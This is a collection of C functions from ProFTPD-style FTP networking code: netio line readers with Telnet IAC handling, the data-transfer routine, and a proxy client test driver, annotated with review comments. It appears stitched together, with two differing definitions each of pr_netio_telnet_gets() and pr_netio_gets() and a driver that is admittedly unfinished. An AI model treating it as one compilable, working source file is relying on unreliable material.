/* Read from nstrm through the core pr_netio_read(), with the proxy's own
 * netio handler for nstrm's stream type temporarily unset (presumably so the
 * core read path is used directly rather than the proxy's hook).  The errno
 * left by the read is preserved across the handler restore.
 *
 * Returns whatever pr_netio_read() returned, or -1 with errno = EINVAL when
 * nstrm is NULL.
 */
int proxy_netio_read(pr_netio_stream_t *nstrm, char *buf, size_t bufsz, int bufmin) {
  if (nstrm == NULL) {
    errno = EINVAL;
    return -1;
  }

  /* Hand the stream type back to the core netio for the duration of the read. */
  pr_netio_t *saved_netio = proxy_netio_unset(nstrm->strm_type, "netio_read");
  int nread = pr_netio_read(nstrm, buf, bufsz, bufmin);
  int saved_errno = errno;

  /* Reinstall our handler, then restore errno in case the restore touched it. */
  proxy_netio_set(nstrm->strm_type, saved_netio);
  errno = saved_errno;

  return nread;
}
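/* Stand-alone driver exercising the proxy FTP client code against a fixed
 * host ("ftp.proftpd.org", port 21): resolve the name, connect via
 * proxy_ftp_connect(), disconnect again, then open a control stream on the
 * client connection, read one response and send QUIT.  Progress is printed
 * to stdout, errors to stderr.  Returns 0 on success and 1 on any failure.
 * argc/argv are unused.
 */
int main(int argc, char *argv[]) {
  pool *p = NULL;
  const char *remote_name = NULL;
  pr_netaddr_t *remote_addr = NULL;
  conn_t *client_conn = NULL, *ctrl_conn = NULL;
  unsigned int connect_timeout, remote_port;
  struct proxy_ftp_client *ftp = NULL;
  int res;
  char buf[1024];

  (void) argc;
  (void) argv;

  /* Seed the random number generator. */
  /* XXX Use random(3) in the future? */
  srand((unsigned int) (time(NULL) * getpid()));

  init_pools();
  init_privs();
  init_log();
  init_regexp();
  init_inet();
  init_netio();
  init_netaddr();
  init_fs();
  init_class();
  init_config();
  init_stash();

  pr_log_setdebuglevel(10);
  log_stderr(TRUE);
  pr_trace_use_stderr(TRUE);
  pr_trace_set_levels("DEFAULT", 1, 20);

  p = make_sub_pool(permanent_pool);
  pr_pool_tag(p, "FTP Client Pool");

  remote_name = "ftp.proftpd.org";
  remote_addr = pr_netaddr_get_addr(p, remote_name, NULL);
  if (remote_addr == NULL) {
    fprintf(stderr, "Failed to get addr for '%s': %s\n", remote_name, strerror(errno));
    destroy_pool(p);
    return 1;
  }

  fprintf(stdout, "Resolved name '%s' to IP address '%s'\n", remote_name, pr_netaddr_get_ipstr(remote_addr));

  remote_port = 21;
  connect_timeout = 5;

  ftp = proxy_ftp_connect(p, remote_addr, remote_port, connect_timeout, NULL);
  if (ftp == NULL) {
    fprintf(stderr, "Error connecting to FTP server: %s\n", strerror(errno));
    destroy_pool(p);
    return 1;
  }

  /* client_conn was dereferenced below without ever being assigned.  The
   * connection handle presumably has to be taken from 'ftp' (its layout is
   * not visible here) -- TODO wire that up.  Until then, fail explicitly
   * rather than read an indeterminate pointer.
   */
  if (client_conn == NULL) {
    fprintf(stderr, "No client connection handle available after connecting to %s:%u\n", remote_name, remote_port);
    destroy_pool(p);
    return 1;
  }

  /* remote_port is unsigned and ntohs() yields a 16-bit value: print both with %u. */
  fprintf(stdout, "Successfully connected to %s:%u from %s:%u\n", remote_name, remote_port, pr_netaddr_get_ipstr(client_conn->local_addr), (unsigned int) ntohs(pr_netaddr_get_port(client_conn->local_addr)));

  res = proxy_ftp_disconnect(ftp);
  if (res < 0) {
    fprintf(stderr, "Error disconnecting from FTP server: %s\n", strerror(errno));
    destroy_pool(p);
    return 1;
  }

  ctrl_conn = pr_inet_openrw(p, client_conn, NULL, PR_NETIO_STRM_OTHR, -1, -1, -1, FALSE);
  if (ctrl_conn == NULL) {
    fprintf(stderr, "Error opening control connection: %s\n", strerror(errno));
    pr_inet_close(p, client_conn);
    destroy_pool(p);
    return 1;
  }

  fprintf(stdout, "Reading response from %s:%u\n", remote_name, remote_port);

  /* Read the response.  The buffer is zeroed and the read is capped at
   * sizeof(buf)-1 so the last byte stays NUL and the reply can be printed
   * as a string.
   */
  memset(buf, '\0', sizeof(buf));

  /* XXX We need to write our own version of netio_telnet_gets(), with
   * the buffering to handle reassembly of a full FTP response out of
   * multiple TCP packets.  Not sure why the existing netio_telnet_gets()
   * is not sufficient.  But we don't need the handling of Telnet codes
   * in our reading.  But DO generate the 'core.ctrl-read' event, so that
   * any event listeners get a chance to process the data we've received.
   * (Or maybe use 'mod_proxy.server-read', and differentiate between
   * client and server reads/writes?)
   */
  if (pr_netio_read(ctrl_conn->instrm, buf, sizeof(buf)-1, 5) < 0) {
    fprintf(stderr, "Error reading response from server: %s\n", strerror(errno));
  } else {
    fprintf(stdout, "Response: \"%s\"\n", buf);
  }

  /* Disconnect */
  res = pr_netio_printf(ctrl_conn->outstrm, "%s\r\n", C_QUIT);
  if (res < 0) {
    /* A trailing newline was missing from this diagnostic. */
    fprintf(stderr, "Error writing command to server: %s\n", strerror(errno));
  }

  pr_inet_close(p, ctrl_conn);
  pr_inet_close(p, client_conn);
  destroy_pool(p);
  return 0;
}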
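/* errno value reported when the control or data connection has gone away
 * mid-transfer: ECONNABORTED where the platform defines it, else ENOTCONN,
 * else EIO.  Shared by the two "connection lost" paths in pr_data_xfer().
 */
static int data_xfer_conn_errno(void) {
#if defined(ECONNABORTED)
  return ECONNABORTED;
#elif defined(ENOTCONN)
  return ENOTCONN;
#else
  return EIO;
#endif
}

/* Move one chunk of data across the active data connection (session.d).
 *
 * Direction comes from session.xfer.direction:
 *   PR_NETIO_IO_RD: read into cl_buf (at most cl_size bytes).  In ASCII mode
 *     the data is staged in session.xfer.buf and translated by
 *     xfrm_ascii_read() first; bytes that cannot be translated yet are kept
 *     in session.xfer.buf for the next call.
 *   PR_NETIO_IO_WR: write cl_size bytes from cl_buf, in server-xfer-bufsz
 *     sized pieces, through session.xfer.buf (ASCII-translated if needed).
 *
 * Before transferring, the control channel is polled once: a pending command
 * is read and either denied with 450 (transfer and port commands), answered
 * with 200 (NOOP), or dispatched normally.
 *
 * Returns the number of bytes transferred (0 when nothing was moved), or -1
 * on error.  When session.d is NULL, errno is set to the value returned by
 * data_xfer_conn_errno().  Side effects: stalled/idle timers are reset when
 * data moves, and session.xfer.total_bytes, session.total_bytes and the
 * per-direction session counters are advanced by the byte count.
 *
 * A build-conditional block that replaced the outgoing data with substituted
 * content (and leaked a malloc'd buffer for every chunk) has been removed;
 * session.xfer.buf is always the pool-owned transfer buffer here.
 */
int pr_data_xfer(char *cl_buf, int cl_size) {
  int len = 0;
  int total = 0;
  int res = 0;

  /* Poll the control channel for any commands we should handle, like
   * QUIT or ABOR.
   */
  pr_trace_msg(trace_channel, 4, "polling for commands on control channel");
  pr_netio_set_poll_interval(session.c->instrm, 0);
  res = pr_netio_poll(session.c->instrm);
  pr_netio_reset_poll_interval(session.c->instrm);

  if (res == 0 && !(session.sf_flags & SF_ABORT)) {
    cmd_rec *cmd = NULL;

    pr_trace_msg(trace_channel, 1, "data available for reading on control channel during data transfer, " "reading control data");

    res = pr_cmd_read(&cmd);
    if (res < 0) {
      int xerrno = data_xfer_conn_errno();

      pr_trace_msg(trace_channel, 1, "unable to read control command during data transfer: %s", strerror(xerrno));
      errno = xerrno;

#ifndef PR_DEVEL_NO_DAEMON
      /* Otherwise, EOF */
      pr_session_disconnect(NULL, PR_SESS_DISCONNECT_CLIENT_EOF, NULL);
#else
      return -1;
#endif /* PR_DEVEL_NO_DAEMON */

    } else if (cmd != NULL) {
      char *ch;

      /* toupper() takes an int in unsigned char range; a plain (possibly
       * signed) char with the high bit set would be out of range.
       */
      for (ch = cmd->argv[0]; *ch; ch++) {
        *ch = toupper((unsigned char) *ch);
      }

      cmd->cmd_id = pr_cmd_get_id(cmd->argv[0]);

      /* Only handle commands which do not involve data transfers; we
       * already have a data transfer in progress.  For any data transfer
       * command, send a 450 ("busy") reply.  Looks like almost all of the
       * data transfer commands accept that response, as per RFC959.
       *
       * We also prevent the EPRT, EPSV, PASV, and PORT commands, since
       * they will also interfere with the current data transfer.  In doing
       * so, we break RFC compliance a little; RFC959 does not allow a
       * response code of 450 for those commands (although it should).
       */
      if (pr_cmd_cmp(cmd, PR_CMD_APPE_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_LIST_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_MLSD_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_NLST_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_RETR_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_STOR_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_STOU_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_RNFR_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_RNTO_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_PORT_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_EPRT_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_PASV_ID) == 0 ||
          pr_cmd_cmp(cmd, PR_CMD_EPSV_ID) == 0) {
        pool *resp_pool;

        pr_trace_msg(trace_channel, 5, "client sent '%s' command during data transfer, denying", cmd->argv[0]);

        /* Send the 450 from the command's own pool, then put the previous
         * response pool back so the in-progress transfer's replies are
         * unaffected.
         */
        resp_list = resp_err_list = NULL;
        resp_pool = pr_response_get_pool();
        pr_response_set_pool(cmd->pool);
        pr_response_add_err(R_450, _("%s: data transfer in progress"), cmd->argv[0]);
        pr_response_flush(&resp_err_list);
        destroy_pool(cmd->pool);
        pr_response_set_pool(resp_pool);

      /* We don't want to actually dispatch the NOOP command, since that
       * would overwrite the scoreboard with the NOOP state; admins probably
       * want to see the command that caused the data transfer.  And since
       * NOOP doesn't take a 450 response (as per RFC959), we will simply
       * return 200.
       */
      } else if (pr_cmd_cmp(cmd, PR_CMD_NOOP_ID) == 0) {
        pool *resp_pool;

        pr_trace_msg(trace_channel, 5, "client sent '%s' command during data transfer, ignoring", cmd->argv[0]);

        resp_list = resp_err_list = NULL;
        resp_pool = pr_response_get_pool();
        pr_response_set_pool(cmd->pool);
        pr_response_add(R_200, _("%s: data transfer in progress"), cmd->argv[0]);
        pr_response_flush(&resp_list);
        destroy_pool(cmd->pool);
        pr_response_set_pool(resp_pool);

      } else {
        char *title_buf = NULL;
        int title_len = -1;
        const char *sce_cmd = NULL, *sce_cmd_arg = NULL;

        pr_trace_msg(trace_channel, 5, "client sent '%s' command during data transfer, dispatching", cmd->argv[0]);

        /* Save the process title and scoreboard command fields so that the
         * dispatched command does not leave its own state behind; they are
         * restored right after dispatch.
         */
        title_len = pr_proctitle_get(NULL, 0);
        if (title_len > 0) {
          title_buf = pcalloc(cmd->pool, title_len + 1);
          pr_proctitle_get(title_buf, title_len + 1);
        }

        sce_cmd = pr_scoreboard_entry_get(PR_SCORE_CMD);
        sce_cmd_arg = pr_scoreboard_entry_get(PR_SCORE_CMD_ARG);

        pr_cmd_dispatch(cmd);

        pr_scoreboard_entry_update(session.pid, PR_SCORE_CMD, "%s", sce_cmd, NULL, NULL);
        pr_scoreboard_entry_update(session.pid, PR_SCORE_CMD_ARG, "%s", sce_cmd_arg, NULL, NULL);

        if (title_len > 0) {
          pr_proctitle_set_str(title_buf);
        }

        destroy_pool(cmd->pool);
      }

    } else {
      pr_trace_msg(trace_channel, 3, "invalid command sent, sending error response");
      pr_response_send(R_500, _("Invalid command: try being more creative"));
    }
  }

  /* If we don't have a data connection here (e.g. might have been closed
   * by an ABOR), then return an error (no data transferred).
   */
  if (session.d == NULL) {
    int xerrno = data_xfer_conn_errno();

    pr_trace_msg(trace_channel, 1, "data connection is null prior to data transfer (possibly from " "aborted transfer), returning '%s' error", strerror(xerrno));
    pr_log_debug(DEBUG5, "data connection is null prior to data transfer (possibly from " "aborted transfer), returning '%s' error", strerror(xerrno));

    errno = xerrno;
    return -1;
  }

  if (session.xfer.direction == PR_NETIO_IO_RD) {
    char *buf = session.xfer.buf;
    pr_buffer_t *pbuf;

    if (session.sf_flags & (SF_ASCII|SF_ASCII_OVERRIDE)) {
      int adjlen, buflen;

      do {
        buflen = session.xfer.buflen; /* how much remains in buf */
        adjlen = 0;

        pr_signals_handle();

        /* Append new data after whatever was left over from the last call. */
        len = pr_netio_read(session.d->instrm, buf + buflen, session.xfer.bufsize - buflen, 1);
        if (len < 0) {
          return -1;
        }

        /* Before we process the data read from the client, generate an event
         * for any listeners which may want to examine this data.
         * NOTE(review): pbuf->buf points at the start of session.xfer.buf,
         * not at the bytes just read (buf + buflen) -- confirm that is what
         * listeners expect.
         */
        pbuf = pcalloc(session.xfer.p, sizeof(pr_buffer_t));
        pbuf->buf = buf;
        pbuf->buflen = len;
        pbuf->current = pbuf->buf;
        pbuf->remaining = 0;

        pr_event_generate("core.data-read", pbuf);

        /* The event listeners may have changed the data to write out. */
        buf = pbuf->buf;
        len = pbuf->buflen - pbuf->remaining;

        if (len > 0) {
          buflen += len;

          if (timeout_stalled) {
            pr_timer_reset(PR_TIMER_STALLED, ANY_MODULE);
          }
        }

        /* If buflen > 0, data remains in the buffer to be copied. */
        if (len >= 0 && buflen > 0) {

          /* Perform translation:
           *
           * buflen is returned as the modified buffer length after
           *   translation
           * adjlen is returned as the number of characters unprocessed in
           *   the buffer (to be dealt with later)
           *
           * We skip the call to xfrm_ascii_read() in one case:
           * when we have one character in the buffer and have reached
           * end of data, this is so that xfrm_ascii_read() won't sit
           * forever waiting for the next character after a final '\r'.
           */
          if (len > 0 || buflen > 1) {
            xfrm_ascii_read(buf, &buflen, &adjlen);
          }

          /* Now copy everything we can into cl_buf */
          if (buflen > cl_size) {
            /* Because we have to cut our buffer short, make sure this
             * is made up for later by increasing adjlen.
             */
            adjlen += (buflen - cl_size);
            buflen = cl_size;
          }

          memcpy(cl_buf, buf, buflen);

          /* Copy whatever remains at the end of session.xfer.buf to the
           * head of the buffer and adjust buf accordingly.
           *
           * adjlen is now the total bytes still waiting in buf, if
           * anything remains, copy it to the start of the buffer.
           * Source and destination overlap whenever adjlen > buflen, so
           * this has to be memmove(), not memcpy().
           */
          if (adjlen > 0) {
            memmove(buf, buf+buflen, adjlen);
          }

          /* Store everything back in session.xfer. */
          session.xfer.buflen = adjlen;
          total += buflen;
        }

      /* Restart if data was returned by pr_netio_read() (len > 0) but no
       * data was copied to the client buffer (buflen = 0).  This indicates
       * that xfrm_ascii_read() needs more data in order to translate, so we
       * need to call pr_netio_read() again.
       */
      } while (len > 0 && buflen == 0);

      /* Return how much data we actually copied into the client buffer. */
      len = buflen;

    } else if ((len = pr_netio_read(session.d->instrm, cl_buf, cl_size, 1)) > 0) {

      /* Before we process the data read from the client, generate an event
       * for any listeners which may want to examine this data.
       * NOTE(review): the bytes were read into cl_buf, but the event is
       * handed session.xfer.buf; kept as-is pending confirmation of what
       * listeners rely on.
       */
      pbuf = pcalloc(session.xfer.p, sizeof(pr_buffer_t));
      pbuf->buf = buf;
      pbuf->buflen = len;
      pbuf->current = pbuf->buf;
      pbuf->remaining = 0;

      pr_event_generate("core.data-read", pbuf);

      /* The event listeners may have changed the data to write out. */
      buf = pbuf->buf;
      len = pbuf->buflen - pbuf->remaining;

      /* Non-ASCII mode doesn't need to use session.xfer.buf */
      if (timeout_stalled) {
        pr_timer_reset(PR_TIMER_STALLED, ANY_MODULE);
      }

      total += len;
    }

  } else { /* PR_NETIO_IO_WR */

    while (cl_size) {
      int bwrote = 0;
      int buflen = cl_size;
      unsigned int xferbuflen;

      pr_signals_handle();

      /* Never stage more than the configured transfer buffer size at once. */
      if (buflen > pr_config_get_server_xfer_bufsz(PR_NETIO_IO_WR)) {
        buflen = pr_config_get_server_xfer_bufsz(PR_NETIO_IO_WR);
      }

      xferbuflen = buflen;

      /* Fill up our internal buffer. */
      memcpy(session.xfer.buf, cl_buf, buflen);

      if (session.sf_flags & (SF_ASCII|SF_ASCII_OVERRIDE)) {
        /* Scan the internal buffer, looking for LFs with no preceding CRs.
         * Add CRs (and expand the internal buffer) as necessary.  xferbuflen
         * will be adjusted so that it contains the length of data in
         * the internal buffer, including any added CRs.
         */
        xfrm_ascii_write(&session.xfer.buf, &xferbuflen, session.xfer.bufsize);
      }

      bwrote = pr_netio_write(session.d->outstrm, session.xfer.buf, xferbuflen);
      if (bwrote < 0) {
        return -1;
      }

      /* NOTE(review): a zero-byte write leaves cl_size unchanged and the
       * loop retries; whether pr_netio_write() can return 0 is not visible
       * here.
       */
      if (bwrote > 0) {
        if (timeout_stalled) {
          pr_timer_reset(PR_TIMER_STALLED, ANY_MODULE);
        }

        cl_size -= buflen;
        cl_buf += buflen;
        total += buflen;
      }
    }

    len = total;
  }

  if (total && timeout_idle) {
    pr_timer_reset(PR_TIMER_IDLE, ANY_MODULE);
  }

  session.xfer.total_bytes += total;
  session.total_bytes += total;
  if (session.xfer.direction == PR_NETIO_IO_RD) {
    session.total_bytes_in += total;
  } else {
    session.total_bytes_out += total;
  }

  return (len < 0 ? -1 : len);
}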
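/* Read one line (up to and including '\n') from in_nstrm into buf, consuming
 * Telnet IAC negotiation on the way: WILL/WONT are answered on out_nstrm with
 * IAC DONT, DO/DONT with IAC WONT, and "IAC IAC" yields one literal IAC byte.
 * Any other byte after IAC is dropped.  The negotiation state lives in a
 * static, so a sequence split across two reads is picked up by the next call.
 *
 * At most buflen-1 bytes are stored and buf is NUL-terminated whenever a
 * non-NULL result is returned.  Returns buf, or NULL when the stream yielded
 * nothing before any byte was stored, or (errno = EINVAL) when buflen is 0
 * or either stream is NULL.
 */
char *pr_netio_telnet_gets(char *buf, size_t buflen, pr_netio_stream_t *in_nstrm, pr_netio_stream_t *out_nstrm) {
  char *bp = buf;
  unsigned char cp;
  static unsigned char mode = 0;
  int toread;
  pr_buffer_t *pbuf = NULL;

  /* Without this, the buflen-- below wraps a zero size_t to SIZE_MAX and the
   * loop would write far past the end of buf.
   */
  if (buflen == 0 || in_nstrm == NULL || out_nstrm == NULL) {
    errno = EINVAL;
    return NULL;
  }

  buflen--; /* reserve room for the terminating NUL */

  if (in_nstrm->strm_buf) {
    pbuf = in_nstrm->strm_buf;
  } else {
    pbuf = netio_buffer_alloc(in_nstrm);
  }

  while (buflen) {
    /* Is the buffer empty? */
    if (!pbuf->current || pbuf->remaining == pbuf->buflen) {
      toread = pr_netio_read(in_nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1);
      if (toread <= 0) {
        /* EOF/error: hand back whatever was already collected, if anything. */
        if (bp != buf) {
          *bp = '\0';
          return buf;
        }
        return NULL;
      }

      pbuf->remaining = pbuf->buflen - toread;
      pbuf->current = pbuf->buf;

    } else {
      toread = pbuf->buflen - pbuf->remaining;
    }

    while (buflen && toread > 0 && *pbuf->current != '\n' && toread--) {
      cp = *pbuf->current++;
      pbuf->remaining++;

      /* 'continue' here skips storing cp and moves to the next input byte. */
      switch (mode) {
        case IAC:
          switch (cp) {
            case WILL:
            case WONT:
            case DO:
            case DONT:
              /* Remember the verb; its option byte arrives next. */
              mode = cp;
              continue;

            case IAC:
              /* Escaped IAC: store it as a literal byte. */
              mode = 0;
              break;

            default:
              /* Ignore */
              mode = 0;
              continue;
          }
          break;

        case WILL:
        case WONT:
          pr_netio_printf(out_nstrm, "%c%c%c", IAC, DONT, cp);
          mode = 0;
          continue;

        case DO:
        case DONT:
          pr_netio_printf(out_nstrm, "%c%c%c", IAC, WONT, cp);
          mode = 0;
          continue;

        default:
          if (cp == IAC) {
            mode = cp;
            continue;
          }
          break;
      }

      *bp++ = cp;
      buflen--;
    }

    /* Line complete: copy the newline and stop. */
    if (buflen && toread && *pbuf->current == '\n') {
      buflen--;
      toread--;
      *bp++ = *pbuf->current++;
      pbuf->remaining++;
      break;
    }

    /* Input buffer drained: mark it empty so the next pass reads again. */
    if (!toread) {
      pbuf->current = NULL;
    }
  }

  *bp = '\0';
  return buf;
}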
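/* Read one line (up to and including '\n') from nstrm into buf.  Bytes with
 * the high bit set are discarded rather than stored.  At most buflen-1 bytes
 * are stored and buf is NUL-terminated whenever a non-NULL result is
 * returned.  Returns buf, or NULL when the stream yielded nothing before any
 * byte was stored, or (errno = EINVAL) when buflen is 0 or nstrm is NULL.
 */
char *pr_netio_gets(char *buf, size_t buflen, pr_netio_stream_t *nstrm) {
  char *bp = buf;
  int toread;
  pr_buffer_t *pbuf = NULL;

  /* Without this, the buflen-- below wraps a zero size_t to SIZE_MAX and the
   * loop would write far past the end of buf.
   */
  if (buflen == 0 || nstrm == NULL) {
    errno = EINVAL;
    return NULL;
  }

  buflen--; /* reserve room for the terminating NUL */

  if (nstrm->strm_buf) {
    pbuf = nstrm->strm_buf;
  } else {
    pbuf = netio_buffer_alloc(nstrm);
  }

  while (buflen) {
    /* Is the buffer empty? */
    if (!pbuf->current || pbuf->remaining == pbuf->buflen) {
      toread = pr_netio_read(nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1);
      if (toread <= 0) {
        /* EOF/error: hand back whatever was already collected, if anything. */
        if (bp != buf) {
          *bp = '\0';
          return buf;
        }
        return NULL;
      }

      pbuf->remaining = pbuf->buflen - toread;
      pbuf->current = pbuf->buf;

    } else {
      toread = pbuf->buflen - pbuf->remaining;
    }

    while (buflen && *pbuf->current != '\n' && toread--) {
      if (*pbuf->current & 0x80) {
        /* Non-ASCII byte: skip it. */
        pbuf->current++;
      } else {
        *bp++ = *pbuf->current++;
        buflen--;
      }
      pbuf->remaining++;
    }

    /* Line complete: copy the newline and stop. */
    if (buflen && toread && *pbuf->current == '\n') {
      buflen--;
      toread--;
      *bp++ = *pbuf->current++;
      pbuf->remaining++;
      break;
    }

    /* Input buffer drained: mark it empty so the next pass reads again. */
    if (!toread) {
      pbuf->current = NULL;
    }
  }

  *bp = '\0';
  return buf;
}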
/* Read one command line (up to and including '\n') from in_nstrm into buf,
 * handling Telnet IAC negotiation unless NLS support says the encoding cannot
 * carry IAC bytes: WILL/WONT are answered on out_nstrm with IAC DONT, DO/DONT
 * with IAC WONT, "IAC IAC" yields a literal IAC, and any other byte after IAC
 * is stored together with the IAC that preceded it.  Negotiation state is
 * kept in the file-scope telnet_mode so a sequence split across reads carries
 * over to the next call.  Each chunk read from the network is announced to
 * listeners via the "core.ctrl-read" event before it is scanned.
 *
 * At most buflen-1 bytes are stored; buf is NUL-terminated on success.
 * Returns buf on success.  Returns NULL with errno = EINVAL for a zero buflen
 * or NULL stream, NULL when the stream yields nothing (errno as left by
 * pr_netio_read()), and NULL with errno = E2BIG when the line did not fit
 * (properly_terminated_prev_command is cleared so that the remainder of that
 * over-long line, once its newline arrives, is discarded as well).
 */
char *pr_netio_telnet_gets(char *buf, size_t buflen, pr_netio_stream_t *in_nstrm, pr_netio_stream_t *out_nstrm) {
  char *bp = buf;
  unsigned char cp;
  int toread, handle_iac = TRUE, saw_newline = FALSE;
  pr_buffer_t *pbuf = NULL;

  /* buflen-- below would wrap a zero size_t; refuse unusable arguments. */
  if (buflen == 0 || in_nstrm == NULL || out_nstrm == NULL) {
    errno = EINVAL;
    return NULL;
  }

#ifdef PR_USE_NLS
  handle_iac = pr_encode_supports_telnet_iac();
#endif /* PR_USE_NLS */

  buflen--; /* reserve room for the terminating NUL */

  if (in_nstrm->strm_buf) {
    pbuf = in_nstrm->strm_buf;
  } else {
    pbuf = pr_netio_buffer_alloc(in_nstrm);
  }

  while (buflen > 0) {
    pr_signals_handle();

    /* Is the buffer empty? */
    if (pbuf->current == NULL || pbuf->remaining == pbuf->buflen) {
      toread = pr_netio_read(in_nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1);
      if (toread <= 0) {
        /* EOF/error: return what was collected so far, if anything. */
        if (bp != buf) {
          *bp = '\0';
          return buf;
        }
        return NULL;
      }

      pbuf->remaining = pbuf->buflen - toread;
      pbuf->current = pbuf->buf;

      /* Before we begin iterating through the data read in from the
       * network, handing any Telnet characters and such, generate an event
       * for any listeners which may want to examine this data as well.
       */
      pr_event_generate("core.ctrl-read", pbuf);
    }

    toread = pbuf->buflen - pbuf->remaining;

    while (buflen > 0 && toread > 0 && *pbuf->current != '\n' && toread--) {
      pr_signals_handle();

      cp = *pbuf->current++;
      pbuf->remaining++;

      /* 'continue' within the switch skips storing cp and moves on to the
       * next input byte.
       */
      if (handle_iac == TRUE) {
        switch (telnet_mode) {
          case TELNET_IAC:
            switch (cp) {
              case TELNET_WILL:
              case TELNET_WONT:
              case TELNET_DO:
              case TELNET_DONT:
              case TELNET_IP:
              case TELNET_DM:
                /* Why do we do this crazy thing where we set the "telnet mode"
                 * to be the action, and let the while loop, on the next pass,
                 * handle that action?  It's because we don't know, right now,
                 * whether there actually a "next byte" in the input buffer.
                 * There _should_ be -- but we can't be sure.  And that next
                 * byte is needed for properly responding with WONT/DONT
                 * responses.
                 */
                telnet_mode = cp;
                continue;

              case TELNET_IAC:
                /* In this case, we know that the previous byte was TELNET_IAC,
                 * and that the current byte is another TELNET_IAC.  The
                 * first TELNET_IAC thus "escapes" the second, telling us
                 * that the current byte (TELNET_IAC) should be written out
                 * as is (Bug#3697).
                 */
                telnet_mode = 0;
                break;

              default:
                /* In this case, we know that the previous byte was TELNET_IAC,
                 * but the current byte is not a value we care about.  So
                 * write the TELNET_IAC into the output buffer, break out of
                 * of the switch, and let that handle the writing of the
                 * current byte into the output buffer.
                 */
                *bp++ = TELNET_IAC;
                buflen--;
                telnet_mode = 0;
                break;
            }
            break;

          case TELNET_WILL:
          case TELNET_WONT:
            pr_netio_printf(out_nstrm, "%c%c%c", TELNET_IAC, TELNET_DONT, cp);
            telnet_mode = 0;
            continue;

          case TELNET_DO:
          case TELNET_DONT:
            pr_netio_printf(out_nstrm, "%c%c%c", TELNET_IAC, TELNET_WONT, cp);
            telnet_mode = 0;
            continue;

          case TELNET_IP:
          case TELNET_DM:
          default:
            if (cp == TELNET_IAC) {
              telnet_mode = cp;
              continue;
            }
            break;
        }
      }

      /* In the situation where the previous byte was an IAC, we wrote IAC
       * into the output buffer, and decremented buflen (size of the output
       * buffer remaining).  Thus we need to check here if buflen is zero,
       * before trying to decrement buflen again (and possibly underflowing
       * the buflen size_t data type).  cp has already been consumed from the
       * input at this point; the line is over-long and gets rejected below.
       */
      if (buflen == 0) {
        break;
      }

      *bp++ = cp;
      buflen--;
    }

    /* Line complete: store the newline and stop reading. */
    if (buflen > 0 && toread > 0 && *pbuf->current == '\n') {
      buflen--;
      toread--;
      *bp++ = *pbuf->current++;
      pbuf->remaining++;
      saw_newline = TRUE;
      break;
    }

    if (toread == 0) {
      /* No more input?  Set pbuf->current to null, so that at the top of
       * the loop, we read more.
       */
      pbuf->current = NULL;
    }
  }

  if (!saw_newline) {
    /* If we haven't seen a newline, then assume the client is deliberately
     * sending a too-long command, trying to exploit buffer sizes and make
     * the server make some possibly bad assumptions.
     */
    properly_terminated_prev_command = FALSE;
    errno = E2BIG;
    return NULL;
  }

  if (!properly_terminated_prev_command) {
    /* This line is the tail of a previously rejected over-long command;
     * drop it too, and log once.
     */
    properly_terminated_prev_command = TRUE;
    pr_log_pri(PR_LOG_NOTICE, "client sent too-long command, ignoring");
    errno = E2BIG;
    return NULL;
  }

  properly_terminated_prev_command = TRUE;
  *bp = '\0';
  return buf;
}
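/* Read one line (up to and including '\n') from nstrm into buf.  Bytes with
 * the high bit set are discarded rather than stored.  Each chunk read from
 * the network is announced to listeners via the "core.othr-read" event before
 * it is scanned.  At most buflen-1 bytes are stored and buf is NUL-terminated
 * whenever a non-NULL result is returned.
 *
 * Returns buf, or NULL when the stream yielded nothing before any byte was
 * stored (errno as left by pr_netio_read()), or NULL with errno = EINVAL when
 * buflen is 0 or nstrm is NULL.
 */
char *pr_netio_gets(char *buf, size_t buflen, pr_netio_stream_t *nstrm) {
  char *bp = buf;
  int toread;
  pr_buffer_t *pbuf = NULL;

  /* buflen-- below would wrap a zero size_t; nstrm is dereferenced next. */
  if (buflen == 0 || nstrm == NULL) {
    errno = EINVAL;
    return NULL;
  }

  buflen--; /* reserve room for the terminating NUL */

  if (nstrm->strm_buf) {
    pbuf = nstrm->strm_buf;
  } else {
    pbuf = pr_netio_buffer_alloc(nstrm);
  }

  while (buflen) {
    /* Is the buffer empty? */
    if (!pbuf->current || pbuf->remaining == pbuf->buflen) {
      toread = pr_netio_read(nstrm, pbuf->buf, (buflen < pbuf->buflen ? buflen : pbuf->buflen), 1);
      if (toread <= 0) {
        /* EOF/error: hand back whatever was already collected, if anything. */
        if (bp != buf) {
          *bp = '\0';
          return buf;
        }
        return NULL;
      }

      /* (The original assigned these two fields twice in a row.) */
      pbuf->remaining = pbuf->buflen - toread;
      pbuf->current = pbuf->buf;

      /* Before we begin iterating through the data read in from the
       * network, generate an event for any listeners which may want to
       * examine this data as well.
       */
      pr_event_generate("core.othr-read", pbuf);
    }

    toread = pbuf->buflen - pbuf->remaining;

    while (buflen && *pbuf->current != '\n' && toread--) {
      if (*pbuf->current & 0x80) {
        /* Non-ASCII byte: skip it. */
        pbuf->current++;
      } else {
        *bp++ = *pbuf->current++;
        buflen--;
      }
      pbuf->remaining++;
    }

    /* Line complete: copy the newline and stop. */
    if (buflen && toread && *pbuf->current == '\n') {
      buflen--;
      toread--;
      *bp++ = *pbuf->current++;
      pbuf->remaining++;
      break;
    }

    /* Input buffer drained: mark it empty so the next pass reads again. */
    if (!toread) {
      pbuf->current = NULL;
    }
  }

  *bp = '\0';
  return buf;
}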